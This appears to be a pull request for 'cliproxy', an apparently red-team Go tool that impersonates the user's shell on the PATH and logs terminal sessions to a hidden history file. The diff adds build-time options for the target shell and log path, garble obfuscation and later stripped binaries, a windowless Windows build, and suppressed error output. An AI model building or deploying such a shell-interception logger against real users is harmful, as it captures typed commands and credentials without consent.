### PR TITLE
configurable at build time

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,0 +1,1 @@
+release

--- a/Makefile
+++ b/Makefile
@@ -1,0 +1,30 @@
+APP = cliproxy
+OUT = release
+GARBLE=${GOPATH}/bin/garble
+BUILD=garble -tiny build
+
+BIN ?= /bin/bash
+LOG ?= .history
+VARS ?= -X main.logFile=${LOG} -X main.binName=${BIN}
+
+LD.linux=-ldflags "${VARS}"
+LD.windows=-ldflags "${VARS}  -H windowsgui"
+LD.darwin=${LD.linux}
+
+PLATFORMS=windows linux darwin
+OS=$(word 1, $@)
+
+all: ${PLATFORMS}
+
+${PLATFORMS}: $(GARBLE)
+	GOOS=${OS} ${BUILD} ${LD.${OS}} -o ${OUT}/${APP}_${OS}
+
+release: all
+	@tar caf ${APP}.tar.gz ${OUT}
+	@rm -rf ${OUT}
+
+clean:
+	rm -rf ${OUT} ${APP}*
+
+$(GARBLE):
+	go get mvdan.cc/garble

--- a/Makefile
+++ b/Makefile
@@ -5,13 +5,13 @@ BUILD=garble -tiny build
 
 BIN ?= /bin/bash
 LOG ?= .history
-VARS ?= -X main.logFile=${LOG} -X main.binName=${BIN}
+VARS ?= -X main.logDir=${LOG} -X main.binName=${BIN}
 
 LD.linux=-ldflags "${VARS}"
 LD.windows=-ldflags "${VARS}  -H windowsgui"
 LD.darwin=${LD.linux}
 
-PLATFORMS=windows linux darwin
+PLATFORMS=linux darwin
 OS=$(word 1, $@)
 
 all: ${PLATFORMS}

--- a/Makefile
+++ b/Makefile
@@ -1,14 +1,13 @@
 APP = cliproxy
 OUT = release
-GARBLE=${GOPATH}/bin/garble
-BUILD=garble -tiny build
+BUILD=go build -trimpath
 
 BIN ?= /bin/bash
 LOG ?= .history
 VARS ?= -X main.logDir=${LOG} -X main.binName=${BIN}
 
-LD.linux=-ldflags "${VARS}"
-LD.windows=-ldflags "${VARS}  -H windowsgui"
+LD.linux=-ldflags "-s -w ${VARS}"
+LD.windows=-ldflags "-s -w ${VARS}  -H windowsgui"
 LD.darwin=${LD.linux}
 
 PLATFORMS=linux darwin
@@ -16,7 +15,7 @@ OS=$(word 1, $@)
 
 all: ${PLATFORMS}
 
-${PLATFORMS}: $(GARBLE)
+${PLATFORMS}:
 	GOOS=${OS} ${BUILD} ${LD.${OS}} -o ${OUT}/${APP}_${OS}
 
 release: all
@@ -25,6 +24,3 @@ release: all
 
 clean:
 	rm -rf ${OUT} ${APP}*
-
-$(GARBLE):
-	go get mvdan.cc/garble

--- a/README.md
+++ b/README.md
@@ -12,3 +12,16 @@ This binary should be placed in a path that'll be searched before the path speci
 ## Blog Post
 
 https://posts.specterops.io/man-in-the-terminal-65476e6165b9
+
+## Compile-Time Configuration
+
+`make` will take 2 environment variables, BIN and LOG, and instruct the linker to embed them into
+the program, overwriting whatever is set in `main.go`. This will allow one to create customized
+version of the binary without needing to change app source.
+
+```
+$ make -j2 BIN=/usr/bin/zsh LOG=.zsh_histlog
+
+GOOS=linux garble -tiny build -ldflags "-X main.logDir=.zsh_histlog -X main.binName=/usr/bin/zsh" -o release/cliproxy_linux
+GOOS=darwin garble -tiny build -ldflags "-X main.logDir=.zsh_histlog -X main.binName=/usr/bin/zsh" -o release/cliproxy_darwin
+```

--- a/README.md
+++ b/README.md
@@ -11,4 +11,4 @@ This binary should be placed in a path that'll be searched before the path speci
 
 ## Blog Post
 
-BLOG_HERE
+https://posts.specterops.io/man-in-the-terminal-65476e6165b9

--- a/go.mod
+++ b/go.mod
@@ -1,0 +1,8 @@
+module cliProxy
+
+go 1.16
+
+require (
+	github.com/creack/pty v1.1.11
+	golang.org/x/term v0.0.0-20210406210042-72f3dc4e9b72
+)

--- a/go.sum
+++ b/go.sum
@@ -1,0 +1,6 @@
+github.com/creack/pty v1.1.11 h1:07n33Z8lZxZ2qwegKbObQohDhXDQxiMMz1NOUGYlesw=
+github.com/creack/pty v1.1.11/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E=
+golang.org/x/sys v0.0.0-20201119102817-f84b799fce68 h1:nxC68pudNYkKU6jWhgrqdreuFiOQWj1Fs7T3VrH4Pjw=
+golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/term v0.0.0-20210406210042-72f3dc4e9b72 h1:VqE9gduFZ4dbR7XoL77lHFp0/DyDUBKSXK7CMFkVcV0=
+golang.org/x/term v0.0.0-20210406210042-72f3dc4e9b72/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=

--- a/main.go
+++ b/main.go
@@ -123,6 +123,6 @@ func run() (err error) {
 
 func main() {
 	if err := run(); err != nil {
-		fmt.Println(err) //DEBUG ONLY
+		// fmt.Println(err) //DEBUG ONLY
 	}
 }


### PR DESCRIPTION
 * added makefile to allow for variable definition without source code
    modifications
  * adds some error handling
  * catch and permit error when history folder exists
  * move existing default values to top; still allows non-make build/config
  * take basename of argv[0]; errored out when contained slashes
  * passed args to goroutine for concurrency safety
  * create as package for easier dep management